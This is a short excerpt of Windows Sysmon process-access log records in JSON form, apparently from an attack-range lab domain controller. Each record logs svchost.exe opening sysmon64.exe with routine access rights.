{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1477,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1478,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1479,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1480,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.792\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.792","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1481,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.793\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.793","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1482,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.793\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.793","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
